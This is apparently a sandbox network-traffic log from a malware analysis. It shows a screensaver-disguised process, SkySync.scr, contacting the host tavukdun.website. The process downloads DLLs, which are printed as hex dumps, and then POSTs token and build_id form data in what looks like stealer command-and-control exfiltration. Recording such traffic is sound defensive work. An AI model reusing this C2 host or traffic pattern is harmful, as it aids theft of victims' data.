2024-11-01 19:58:30 UTC	16384	IN	Data Raw: 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 Data Ascii: u ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-11-01 19:58:30 UTC	16384	IN	Data Raw: 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 Data Ascii: uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-11-01 19:58:30 UTC	16384	IN	Data Raw: 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c Data Ascii: ]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|
2024-11-01 19:58:30 UTC	16384	IN	Data Raw: c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.11.20	58989	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:31 UTC	247	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:31 UTC	259	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:31 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Friday, 01-Nov-2024 19:58:31 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-11-01 19:58:31 UTC	16125	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-11-01 19:58:31 UTC	16384	IN	Data Raw: 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 Data Ascii: t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;B
2024-11-01 19:58:31 UTC	16384	IN	Data Raw: 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 Data Ascii: EEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt
2024-11-01 19:58:31 UTC	16384	IN	Data Raw: c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-11-01 19:58:31 UTC	15603	IN	Data Raw: 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f Data Ascii: @L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicroso

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.11.20	58990	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:32 UTC	239	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:32 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:32 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Friday, 01-Nov-2024 19:58:32 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-11-01 19:58:32 UTC	16123	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-11-01 19:58:33 UTC	16384	IN	Data Raw: f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQ
2024-11-01 19:58:33 UTC	16384	IN	Data Raw: 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b Data Ascii: Q=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-11-01 19:58:33 UTC	16384	IN	Data Raw: 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d Data Ascii: @;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-11-01 19:58:33 UTC	16384	IN	Data Raw: 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
2024-11-01 19:58:33 UTC	16384	IN	Data Raw: d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-11-01 19:58:33 UTC	16384	IN	Data Raw: 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 Data Ascii: 8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$
2024-11-01 19:58:33 UTC	16384	IN	Data Raw: 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
2024-11-01 19:58:33 UTC	16384	IN	Data Raw: e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 Data Ascii: `P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rtt
2024-11-01 19:58:33 UTC	16384	IN	Data Raw: 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.11.20	58991	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:35 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 1125 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:35 UTC	1125	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 